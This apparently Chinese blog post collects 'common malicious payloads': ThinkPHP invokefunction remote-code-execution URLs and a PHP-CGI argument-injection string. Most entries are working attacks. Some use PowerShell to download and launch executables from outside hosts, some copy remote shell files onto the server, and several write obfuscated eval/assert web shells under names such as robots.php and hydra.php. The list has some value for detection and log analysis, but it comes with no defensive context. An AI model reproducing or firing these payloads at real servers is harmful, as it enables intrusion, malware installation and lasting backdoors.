常见的恶意payload

解码后：

/public/index.php?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/bmlhggsflrnrend14224.exe');start %SystemRoot%/Temp/bmlhggsflrnrend14224.exe

/public/index.php?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fk.openyourass.club/download.exe','%SystemRoot%/Temp/fppayjgrzdamwig20150.exe');start%20%SystemRoot%/Temp/fppayjgrzdamwig20150.exe  //?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));  //index.php?s=index///think//Container/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://www.520yxsf.com/shell.txt&vars[1][]=libsoft.php  //?s=index//think/template/driver/file/write&cacheFile=robots.php&content=xbshell1<?php$password%20=%20"xinba";$ch%20=%20explode(".","hello.ass.world.er.t");array_intersect_ukey(array($_REQUEST[$password]%20=>%201),%20array(1),%20$ch[1].$ch[3].$ch[4]);?>  //?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?>  //?s=index//think/template/driver/file/write&cacheFile=robots1.php&content=xbshell<?php%20@eval($_POST[admin]);?>  /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://43.255.29.112/php/dd.txt&vars%5B1%5D%5B%5D=dp.php  /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50  /public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php  //index.php?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()  /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://43.255.29.112/php/dd.txt&vars%5B1%5D%5B%5D=dp.php

2.cgi-bin漏洞

/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

还在陆续整理中。。。。

http://www.oniont.cn/index.php/archives/307.html